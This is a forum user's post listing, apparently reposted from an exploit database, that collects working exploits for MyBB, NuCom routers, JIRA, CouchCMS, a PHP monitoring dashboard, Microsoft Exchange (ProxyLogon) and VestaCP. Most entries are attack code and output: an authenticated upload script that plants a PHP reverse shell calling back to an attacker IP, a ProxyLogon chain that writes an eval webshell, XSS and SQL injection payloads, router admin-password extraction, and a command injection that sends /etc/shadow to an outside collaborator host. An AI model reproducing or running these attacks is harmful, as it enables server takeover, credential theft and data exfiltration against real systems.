
Everything posted by HireHackking
-
MyBB OUGC Feedback Plugin 1.8.22 - Cross-Site Scripting
# Exploit Title: MyBB OUGC Feedback Plugin 1.8.22 - Cross-Site Scripting
# Date: 1/30/2021
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1220
# Version: 1.8.22
# Tested on: Windows 10
# CVE: CVE-2021-28115

1. Description:
This plugin adds a feedback system to your forum. The Edit feedback button is vulnerable to XSS.

2. Proof of Concept:
- Go to a user profile
- Add feedback and leave the following payload as the comment
  "><script>alert(1)</script>
- View the feedback: feedback.php?uid=2
- When clicking Edit, the payload will execute
-
NuCom 11N Wireless Router 5.07.90 - Remote Privilege Escalation
# Exploit Title: NuCom 11N Wireless Router 5.07.90 - Remote Privilege Escalation
# Date: 01.03.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.nucom.es

Vendor: NUEVAS COMUNICACIONES IBERIA, S.A.
Product web page: https://www.nucom.es
Affected version: 5.07.90_multi_NCM01
                  5.07.89_multi_NCM01
                  5.07.72_multi_NCM01

Summary: The NC routers upgrade your network to the next generation of WiFi. With combined wireless speeds of up to 1750 Mbps, the device provides better speeds and wireless range. Includes 2 FXS ports for any VoIP service. If you prefer a wired connection, the NC routers have gigabit ports to provide an incredibly fast, lag-free experience. 3.0 ports allow you to power a robust home Internet network by sharing printers, flash storage, FTP servers, or media players.

Desc: The application suffers from a privilege escalation vulnerability. The non-privileged default user (user:user) can elevate his/her privileges by sending an HTTP GET request to the configuration backup endpoint and disclosing the http super password (admin credentials) as a Base64 encoded value. Once authenticated as admin, an attacker will be granted access to the additional and privileged pages.

Tested on: GoAhead-Webs
           Tenda

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5629
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5629.php

01.03.2021

--

lqwrm@metalgear:~/prive$ echo -e '\nThe admin password is: ' ; \
> curl -s http://192.168.0.1:8080/cgi-bin/DownloadNoMacaddrCfg/RouterCfm.cfg?random=0.251 \
> -H 'Cookie: ecos_pw=dXNlcg==1311930653:language=en' | \
> grep -oP '(?<=http_supper_passwd=).*' | \
> base64 -d 2>/dev/null | \
> xargs echo -n ; \
> echo -e '\n-----------\n'

The admin password is:
MammaMia123
-----------

lqwrm@metalgear:~/prive$
-
Atlassian JIRA 8.11.1 - User Enumeration
# Title: Atlassian JIRA 8.11.1 - User Enumeration
# Author: Dolev Farhi
# Vulnerable versions: version < 7.13.16, 8.0.0 ≤ version < 8.5.7, 8.6.0 ≤ version < 8.12.0
# CVE: CVE-2020-14181
# Credit to original CVE author: Mikhail Klyuchnikov of Positive Technologies.

import sys
import os
import requests


def help():
    print('python3 script.py <target> <usernames_file>')
    print('e.g. python3 script.py https://jiratarget.com usernames.txt')
    sys.exit()


if len(sys.argv) < 3:
    help()

server = sys.argv[1]
usernames = sys.argv[2]
random_user = '0x00001'

# os.path.exists() returns False instead of raising, so test its result directly
if not os.path.exists(usernames):
    print(usernames, 'file does not exist.')
    sys.exit(1)


def test_vulnerable():
    # probe with a username that should not exist: a vulnerable instance
    # echoes it back in a "User does not exist" message
    resp = requests.get('{}/secure/ViewUserHover.jspa?username={}'.format(server, random_user))
    if 'User does not exist: {}'.format(random_user) in resp.text:
        return True
    return False


# the function has to be called; comparing the function object to False never matches
if not test_vulnerable():
    print('server is not vulnerable.')
    sys.exit(1)

f = open(usernames, 'r').read()
for username in f.splitlines():
    resp = requests.get('{}/secure/ViewUserHover.jspa?username={}'.format(server, username))
    if 'User does not exist' not in resp.text:
        print('EXISTS', username)
-
bVPN 2.5.1 - 'waselvpnserv' Unquoted Service Path
# Exploit Title: bVPN 2.5.1 - 'waselvpnserv' Unquoted Service Path
# Date: 2021-1-19
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: https://carolcoral.github.io/no-free_vpn/
# Software Link: https://github.com/carolcoral/no-free_vpn/releases/download/BVPN%4020190225/bVPN_2_5_1_setup.exe
# Version: Version 2.5.1
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763

# Service info:

C:\Users\m507>sc qc "waselvpnserv"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: waselvpnserv
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:/Program Files (x86)/bVPN Service/bVPN/waselvpnserv.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : waselvpnserv
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\m507>

# Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.
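The check an administrator or auditor wants here is a mechanical one: is the service's BINARY_PATH_NAME quoted, and does the executable path contain spaces? The script below is an added example (not part of the advisory) that parses `sc qc` output of the shape shown above and applies exactly that test; the sample text is a constructed copy of the advisory's output, and `quoted_path()` produces the value that `sc config <service> binPath=` should be given to fix it.

```python
"""Flag Windows services whose BINARY_PATH_NAME is unquoted and contains spaces.

Added defender-side example; not part of the bVPN advisory.
"""
import re

# Constructed sample: the `sc qc waselvpnserv` dump quoted in the advisory
SAMPLE_SC_QC = """\
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: waselvpnserv
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:/Program Files (x86)/bVPN Service/bVPN/waselvpnserv.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : waselvpnserv
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

# KEY : value lines; the key needs two or more characters so that a drive
# letter such as "C:" in a prompt line is never taken for a field name
_FIELD = re.compile(r"^\s*([A-Z_]{2,})\s*:\s*(.*?)\s*$")


def parse_sc_qc(text):
    """Return the KEY: value fields of an `sc qc` dump as a dict."""
    fields = {}
    for line in text.splitlines():
        m = _FIELD.match(line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def executable_part(bin_path):
    """Executable portion of a service command line: everything up to and
    including the first '.exe'; the rest is treated as arguments."""
    idx = bin_path.lower().find(".exe")
    return bin_path if idx == -1 else bin_path[: idx + 4]


def is_unquoted_service_path(bin_path):
    """True when the path is not wrapped in double quotes and the executable
    path contains a space. The service control manager then tries each
    space-delimited prefix (C:/Program, C:/Program Files (x86)/bVPN, ...)
    as a program before reaching the real one, which is the weakness."""
    p = bin_path.strip()
    if p.startswith('"'):
        return False
    return " " in executable_part(p)


def quoted_path(bin_path):
    """The remediated value: executable wrapped in quotes, arguments kept."""
    p = bin_path.strip()
    exe = executable_part(p)
    return '"%s"%s' % (exe, p[len(exe):])


def audit(text):
    """(service_name, binary_path, vulnerable) for one `sc qc` dump."""
    f = parse_sc_qc(text)
    path = f.get("BINARY_PATH_NAME", "")
    return f.get("SERVICE_NAME", ""), path, is_unquoted_service_path(path)


if __name__ == "__main__":
    name, path, vuln = audit(SAMPLE_SC_QC)
    print(name, "UNQUOTED" if vuln else "ok", path)
    if vuln:
        print("remediation value for sc config %s binPath= : %s" % (name, quoted_path(path)))
```

On a live host the same functions can be fed the output of `subprocess.run(["sc", "qc", name], capture_output=True, text=True).stdout`; the regexes only need the dump itself, not the prompt lines.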
-
CouchCMS 2.2.1 - Persistent Cross-Site Scripting
# Exploit Title: CouchCMS 2.2.1 - XSS via SVG file upload
# Date: 2021-01-25
# Exploit Author: xxcdd
# Vendor Homepage: https://github.com/CouchCMS/CouchCMS
# Software Link: https://github.com/CouchCMS/CouchCMS
# Version: v2.2.1
# Tested on: Windows 7

An issue was discovered in CouchCMS v2.2.1 (https://github.com/CouchCMS/CouchCMS/issues/130) that allows XSS via an /couch/includes/kcfinder/browse.php SVG upload.

Upload URL: /couch/includes/kcfinder/browse.php?nonce=[yournonce]&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en
(e.g. http://127.0.0.1/couch/includes/kcfinder/browse.php?nonce=02b16f710f786c61f34e301eae552bdf&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en)

xss.svg content:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.cookie);
   </script>
</svg>
-
Title: Kali2022 Install PyCharm
PyCharm is an integrated development environment for Python with the ability to debug, generate and run code. PyCharm is an indispensable tool for Python developers.

Environmental Requirements

Minimum 2 GB memory, recommended 8 GB memory
1024x768 minimum screen resolution
Python 2.7, or Python 3.5 or higher

This article installs it on Kali 2022.

Download Installation Pack

First, go to PyCharm's official website to download the installation package: https://www.jetbrains.com/pycharm/download/#section=windows

Currently, PyCharm provides versions for three different operating systems. Here we choose Kali as the operating system, so click Linux.

Select the Community version, then Download.

After the download completes, copy the archive into Kali. Execute the following command to decompress the file.

tar -zxvf pycharm-community-2022.1.3.tar.gz

Run

cd bin    # enter the bin directory
./

Agree to the agreement and choose whether to send anonymous statistics; PyCharm then runs.
-
Monitoring System (Dashboard) 1.0 - File Upload RCE (Authenticated)
# Exploit Title: Monitoring System (Dashboard) 1.0 - File Upload RCE (Authenticated)
# Exploit Author: Richard Jones
# Date: 2021-03-11
# Vendor Homepage: https://www.sourcecodester.com/php/11741/monitoring-system-dashboard.html
# Software Link: https://www.sourcecodester.com/download-code?nid=11741&title=Monitoring+System+%28Dashboard%29+using+PHP+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

# Usage.
# Change TARGET_IP, REV_IP, REV_PORT to your own

import requests


def main():
    ##### Change info here #####
    TARGET_IP = "127.0.0.1"
    REV_IP = "127.0.0.1"
    REV_PORT = 9999
    ############################

    LOGIN = "/asistorage/login.php"
    MAILING_LIST = "/asistorage/modules/random/index.php?view=add"
    UPLOAD_URL = "/asistorage/modules/random/upload.php"
    VIEW_ITEM = "/asistorage/modules/random/index.php"
    CALL_URL = "/asistorage/modules/random/uploads/"

    s = requests.Session()

    def phpshell():
        return """
<?php
// Copyright (c) 2020 Ivan Šincek
// v1.1
// Requires PHP v5.0.0 or greater.
// Works on Linux OS, macOS and Windows OS.
// See the original script at https://github.com/pentestmonkey/php-reverse-shell.
header('Content-Type: text/plain; charset=UTF-8');
class Shell {
    private $addr  = null;
    private $port  = null;
    private $os    = null;
    private $shell = null;
    private $descriptorspec = array(
        0 => array('pipe', 'r'), // shell can read from STDIN
        1 => array('pipe', 'w'), // shell can write to STDOUT
        2 => array('pipe', 'w')  // shell can write to STDERR
    );
    private $options = array(); // proc_open() options
    private $buffer  = 1024;    // read/write buffer size
    private $clen    = 0;       // command length
    private $error   = false;   // stream read/write error
    public function __construct($addr, $port) {
        $this->addr = $addr;
        $this->port = $port;
        if (stripos(PHP_OS, 'LINUX') !== false) { // same for macOS
            $this->os    = 'LINUX';
            $this->shell = '/bin/sh';
        } else if (stripos(PHP_OS, 'WIN32') !== false || stripos(PHP_OS, 'WINNT') !== false || stripos(PHP_OS, 'WINDOWS') !== false) {
            $this->os    = 'WINDOWS';
            $this->shell = 'cmd.exe';
            $this->options['bypass_shell'] = true; // we do not want a shell within a shell
        } else {
            echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n";
            exit(0);
        }
    }
    private function daemonize() {
        set_time_limit(0); // do not impose the script execution time limit
        if (!function_exists('pcntl_fork')) {
            echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n";
        } else {
            if (($pid = pcntl_fork()) < 0) {
                echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n";
            } else if ($pid > 0) {
                echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n";
                exit(0);
            } else if (posix_setsid() < 0) { // once daemonized you will no longer see the script's dump
                echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n";
            } else {
                echo "DAEMONIZE: Completed successfully!\n";
            }
        }
        umask(0); // set the file/directory permissions - 666 for files and 777 for directories
    }
    private function read($stream, $name, $buffer) {
        if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream
            $this->error = true; // set global error flag
            echo "STRM_ERROR: Cannot read from ${name}, script will now exit...\n";
        }
        return $data;
    }
    private function write($stream, $name, $data) {
        if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream
            $this->error = true; // set global error flag
            echo "STRM_ERROR: Cannot write to ${name}, script will now exit...\n";
        }
        return $bytes;
    }
    // read/write method for non-blocking streams
    private function rw($input, $output, $iname, $oname) {
        while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {
            echo $data; // script's dump
            if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length
        }
    }
    // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS)
    // we must read the exact byte length from a stream and not a single byte more
    private function brw($input, $output, $iname, $oname) {
        $size = fstat($input)['size'];
        if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) { // for some reason Windows OS pipes STDIN into STDOUT
            $size -= $this->offset($input, $iname, $this->clen); // we do not like that
            $this->clen = 0;
        }
        $fragments = ceil($size / $this->buffer); // number of fragments to read
        $remainder = $size % $this->buffer; // size of the last fragment if it is less than the buffer size
        while ($fragments && ($data = $this->read($input, $iname, $remainder && $fragments-- == 1 ? $remainder : $this->buffer)) && $this->write($output, $oname, $data)) {
            echo $data; // script's dump
        }
    }
    private function offset($stream, $name, $offset) {
        $total = $offset;
        while ($offset > 0 && $this->read($stream, $name, $offset >= $this->buffer ? $this->buffer : $offset)) { // discard the data from a stream
            $offset -= $this->buffer;
        }
        return $offset > 0 ? $total - $offset : $total;
    }
    public function run() {
        $this->daemonize();
        // ----- SOCKET BEGIN -----
        $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);
        if (!$socket) {
            echo "SOC_ERROR: {$errno}: {$errstr}\n";
        } else {
            stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS
            // ----- SHELL BEGIN -----
            $process = proc_open($this->shell, $this->descriptorspec, $pipes, '/', null, $this->options);
            if (!$process) {
                echo "PROC_ERROR: Cannot start the shell\n";
            } else {
                foreach ($pipes as $pipe) {
                    stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS
                }
                // ----- WORK BEGIN -----
                fwrite($socket, "SOCKET: Shell has connected! PID: " . proc_get_status($process)['pid'] . "\n");
                while (!$this->error) {
                    if (feof($socket)) { // check for end-of-file on SOCKET
                        echo "SOC_ERROR: Shell connection has been terminated\n";
                        break;
                    } else if (feof($pipes[1]) || !proc_get_status($process)['running']) { // check for end-of-file on STDOUT or if process is still running
                        echo "PROC_ERROR: Shell process has been terminated\n";
                        break; // feof() does not work with blocking streams
                    }          // use proc_get_status() instead
                    $streams = array(
                        'read'   => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR
                        'write'  => null,
                        'except' => null
                    );
                    $num_changed_streams = stream_select($streams['read'], $streams['write'], $streams['except'], null); // wait for stream changes | will not wait on Windows OS
                    if ($num_changed_streams === false) {
                        echo "STRM_ERROR: stream_select() failed\n";
                        break;
                    } else if ($num_changed_streams > 0) {
                        if ($this->os === 'LINUX') {
                            if (in_array($socket  , $streams['read'])) { $this->rw($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
                            if (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
                            if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
                        } else if ($this->os === 'WINDOWS') {
                            // order is important
                            if (in_array($socket, $streams['read'])) { $this->rw ($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
                            if (fstat($pipes[2])['size']/*-------*/) { $this->brw($pipes[2], $socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
                            if (fstat($pipes[1])['size']/*-------*/) { $this->brw($pipes[1], $socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
                        }
                    }
                }
                // ------ WORK END ------
                foreach ($pipes as $pipe) {
                    fclose($pipe);
                }
                proc_close($process);
            }
            // ------ SHELL END ------
            fclose($socket);
        }
        // ------ SOCKET END ------
    }
}
// change the host address and/or port number as necessary
$reverse_shell = new Shell('OLDIP', OLDPORT);
$reverse_shell->Run();
?>"""

    def login(url, username, password):
        try:
            data = {
                "uname": username,
                "upass": password,
                "btnlogin": ""
            }
            r = s.post(url, data=data, verify=False)
            page = r.text
            if "Invalid Username or Password, please try again." in page:
                return False
            else:
                return True
        except:
            return False

    def uploadShell(url):
        s.get(f"{url}{MAILING_LIST}")  # Call page
        fileData = {
            'uploaded_file': ("rev.php",
                              str(phpshell().replace("OLDIP", REV_IP).replace("OLDPORT", str(REV_PORT))).encode(),
                              "application/octet-stream")}
        data = {
            "pname": "",
            "pname": "a",
            'cutoff': '',
            'cutoff': 'a',
            'projectname': '',
            'type': 'a',
            'projectname': '',
            'dsend': '2029-03-19',
            'desc': 'a',
            'MAX_FILE_SIZE': 100000,
            'Uploader': '',
        }
        up_url = f"{url}{UPLOAD_URL}"
        r = s.post(up_url, files=fileData, data=data, verify=False)
        if r.status_code == 200:
            print("shell uploaded")
        else:
            print("Shell upload failed")
            exit(0)
        r = s.get(f"{url}{VIEW_ITEM}")
        page = r.text
        DL_URL = page.split("download.php?filename=")[1].split("\">")[0]
        return DL_URL

    # Login
    base_url = f"http://{TARGET_IP}"
    login_url = f"{base_url}{LOGIN}"
    b = login(login_url, "jim", "jim")
    if not b:
        print("Login failed, Try again...")
        exit(0)

    # Call shell
    base = f"{base_url}"
    CALL_URL_PART = uploadShell(base)
    c_url = f"{base}{CALL_URL}{CALL_URL_PART}"
    s.get(c_url)
    # Shell can be found at http:/TARGET//asistorage/modules/random/uploads/


if __name__ == "__main__":
    main()
-
Monitoring System (Dashboard) 1.0 - 'uname' SQL Injection
# Exploit Title: Monitoring System (Dashboard) 1.0 - 'uname' SQL Injection
# Exploit Author: Richard Jones
# Date: 2021-01-26
# Vendor Homepage: https://www.sourcecodester.com/php/11741/monitoring-system-dashboard.html
# Software Link: https://www.sourcecodester.com/download-code?nid=11741&title=Monitoring+System+%28Dashboard%29+using+PHP+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

Steps.

1. Run sqlmap
sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch

2. Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=a' AND (SELECT 4539 FROM (SELECT(SLEEP(5)))zdoW) AND 'YWTS'='YWTS&upass=w&btnlogin=

Exploit paths:

Database:
sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch --dbms=mysql --dbs

Tables:
sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch --dbms=mysql -D asidatabase --tables

[11 tables]
+------------+
| accounts   |
| attendance |
| contacts   |
| employee   |
| gallery    |
| msexcel    |
| msppt      |
| msword     |
| oic        |
| random     |
| sign       |
+------------+
-
Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)
# Exploit Title: Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)
# Exploit Author : Enes Özeser
# Exploit Date: 2021-02-28
# Vendor Homepage : https://www.nsauditor.com/
# Link Software : https://www.nsauditor.com/downloads/nhsi_setup.exe
# Version: 1.6.4.0
# Tested on: Windows 10

# Steps:
1- Run the python script. (payload.py)
2- Open payload.txt and copy content to clipboard.
3- Run 'Nsasoft Hardware Software Inventory 1.6.4.0'.
4- Register -> Enter Registration Code
5- Paste clipboard into the "Key" or "Name".
6- Click on OK.
7- Crashed.

---> payload.py <---

#!/usr/bin/env python
# writes 300 'A' bytes to payload.txt; print() with parentheses runs on Python 2 and 3
buffer = "\x41" * 300
try:
    f = open("payload.txt", "w")
    f.write(buffer)
    f.close()
    print("File created!")
except:
    print("File cannot be created!")
-
Microsoft Exchange 2019 - Server-Side Request Forgery (Proxylogon) (PoC)
# Exploit Title: Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)
# Date: 2021-03-10
# Exploit Author: testanull
# Vendor Homepage: https://www.microsoft.com
# Version: MS Exchange Server 2013, 2016, 2019
# CVE: 2021-26855, 2021-27065

import requests
from urllib3.exceptions import InsecureRequestWarning
import random
import string
import sys


def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))


if len(sys.argv) < 2:
    print("Usage: python PoC.py <target> <email>")
    print("Example: python PoC.py mail.evil.corp haxor@evil.corp")
    exit()

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

target = sys.argv[1]
email = sys.argv[2]
random_name = id_generator(3) + ".js"
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"

shell_path = "Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ahihi.aspx"
shell_absolute_path = "\\\\127.0.0.1\\c$\\%s" % shell_path
shell_content = '<script language="JScript" runat="server"> function Page_Load(){/**/eval(Request["exec_code"],"unsafe");}</script>'

legacyDnPatchByte = "68747470733a2f2f696d6775722e636f6d2f612f7a54646e5378670a0a0a0a0a0a0a0a"

autoDiscoverBody = """<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
    <Request>
      <EMailAddress>%s</EMailAddress>
      <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
    </Request>
</Autodiscover>
""" % email

print("Attacking target " + target)
print("=============================")
print(legacyDnPatchByte.decode('hex'))

FQDN = "EXCHANGE"

ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={"Cookie": "X-BEResource=localhost~1942062522", "User-Agent": user_agent}, verify=False)
if "X-CalculatedBETarget" in ct.headers and "X-FEServer" in ct.headers:
    FQDN = ct.headers["X-FEServer"]

ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
    "Cookie": "X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;" % FQDN,
    "Content-Type": "text/xml",
    "User-Agent": user_agent},
    data=autoDiscoverBody, verify=False
)
if ct.status_code != 200:
    print("Autodiscover Error!")
    exit()
if "<LegacyDN>" not in ct.content:
    print("Can not get LegacyDN!")
    exit()
legacyDn = ct.content.split("<LegacyDN>")[1].split("</LegacyDN>")[0]
print("Got DN: " + legacyDn)

mapi_body = legacyDn + "\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00"

ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
    "Cookie": "X-BEResource=Admin@%s:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;" % FQDN,
    "Content-Type": "application/mapi-http",
    "User-Agent": user_agent
},
    data=mapi_body, verify=False
)
if ct.status_code != 200 or "act as owner of a UserMailbox" not in ct.content:
    print("Mapi Error!")
    exit()
sid = ct.content.split("with SID ")[1].split(" and MasterAccountSid")[0]
print("Got SID: " + sid)

proxyLogon_request = """<r at="Negotiate" ln="john"><s>%s</s><s a="7" t="1">S-1-1-0</s><s a="7" t="1">S-1-5-2</s><s a="7" t="1">S-1-5-11</s><s a="7" t="1">S-1-5-15</s><s a="3221225479" t="1">S-1-5-5-0-6948923</s></r>
""" % sid

ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
    "Cookie": "X-BEResource=Admin@%s:444/ecp/proxyLogon.ecp?a=~1942062522;" % FQDN,
    "Content-Type": "text/xml",
    "User-Agent": user_agent
},
    data=proxyLogon_request, verify=False
)
if ct.status_code != 241 or not "set-cookie" in ct.headers:
    print("Proxylogon Error!")
    exit()

sess_id = ct.headers['set-cookie'].split("ASP.NET_SessionId=")[1].split(";")[0]
msExchEcpCanary = ct.headers['set-cookie'].split("msExchEcpCanary=")[1].split(";")[0]
print("Got session id: " + sess_id)
print("Got canary: " + msExchEcpCanary)

ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={
    "Cookie": "X-BEResource=Admin@%s:444/ecp/about.aspx?a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
        FQDN, sess_id, msExchEcpCanary),
    "User-Agent": user_agent
},
    verify=False
)
if ct.status_code != 200:
    print("Wrong canary!")
    print("Sometime we can skip this ...")

rbacRole = ct.content.split("RBAC roles:</span> <span class='diagTxt'>")[1].split("</span>")[0]
# print "Got rbacRole: "+ rbacRole
print("=========== It means good to go!!!====")

ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
    "Cookie": "X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
        FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),
    "Content-Type": "application/json; charset=utf-8",
    "User-Agent": user_agent
},
    json={"filter": {
        "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
                       "SelectedView": "", "SelectedVDirType": "All"}}, "sort": {}}, verify=False
)
if ct.status_code != 200:
    print("GetOAB Error!")
    exit()
oabId = ct.content.split('"RawIdentity":"')[1].split('"')[0]
print("Got OAB id: " + oabId)

oab_json = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId},
            "properties": {
                "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
                               "ExternalUrl": "http://ffff/#%s" % shell_content}}}

ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
    "Cookie": "X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
        FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),
    "Content-Type": "application/json; charset=utf-8",
    "User-Agent": user_agent
},
    json=oab_json, verify=False
)
if ct.status_code != 200:
    print("Set external url Error!")
    exit()

reset_oab_body = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId},
                  "properties": {
                      "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
                                     "FilePathName": shell_absolute_path}}}

ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
    "Cookie": "X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
        FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),
    "Content-Type": "application/json; charset=utf-8",
    "User-Agent": user_agent
},
    json=reset_oab_body, verify=False
)
if ct.status_code != 200:
    print("Write Shell Error!")
    exit()
print("Successful!")
-
VestaCP 0.9.8 - 'v_sftp_licence' Command Injection
# Title: VestaCP 0.9.8 - 'v_sftp_licence' Command Injection
# Date: 17.03.2021
# Author: Numan Türle
# Vendor Homepage: https://vestacp.com
# Software Link: https://myvestacp.com < 0.9.8-26-43
# Software Link: https://vestacp.com < 0.9.8-26

POST /edit/server/ HTTP/1.1
Host: TARGET:8083
Connection: close
Content-Length: 6633
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
User-Agent: USER_AGENT
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en,tr-TR;q=0.9,tr;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4
Cookie: PHPSESSID=HERE_COOKIE
sec-gpc: 1

token=149e2b8c201fd88654df6fd694158577&save=save&v_hostname=1338.example.com&v_timezone=Europe%2FIstanbul&v_language=en&v_mail_url=&v_mail_ssl_domain=&v_mysql_url=&v_mysql_password=&v_backup=yes&v_backup_gzip=5&v_backup_dir=%2Fbackup&v_backup_type=ftp&v_backup_host=&v_backup_username=&v_backup_password=&v_backup_bpath=&v_web_ssl_domain=&v_sys_ssl_crt=privatekeyblablabla&v_quota=no&v_firewall=no&v_sftp=yes&v_sftp_licence=1 1337.burpcollaborator.net -o /etc/shadow&v_filemanager=no&v_filemanager_licence=&v_softaculous=yes&save=Save

Parameter : v_sftp_licence=1 1337.burpcollaborator.net -o /etc/shadow
-
CouchCMS 2.2.1 - Server-Side Request Forgery
# Exploit Title: CouchCMS 2.2.1 - SSRF via SVG file upload
# Date: 2021-01-25
# Exploit Author: xxcdd
# Vendor Homepage: https://github.com/CouchCMS/CouchCMS
# Software Link: https://github.com/CouchCMS/CouchCMS
# Version: v2.2.1
# Tested on: Windows 7

